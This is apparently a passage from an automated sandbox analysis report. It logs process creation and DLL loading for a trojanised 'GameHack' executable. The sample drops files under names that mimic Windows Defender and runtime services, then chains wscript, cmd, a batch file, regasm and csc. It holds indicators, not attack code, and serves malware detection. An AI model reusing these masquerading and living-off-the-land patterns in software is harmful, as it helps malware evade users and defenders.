                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" "Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe "C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe"
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tv1xqdyv\tv1xqdyv.cmdline"
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe "C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess created: unknown unknown
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES5B8E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8F87101CD76241BAB3866A995ECAD4A7.TMP"
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: dxgidebug.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: dxgidebug.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeSection loaded: ucrtbase_clr0400.dll
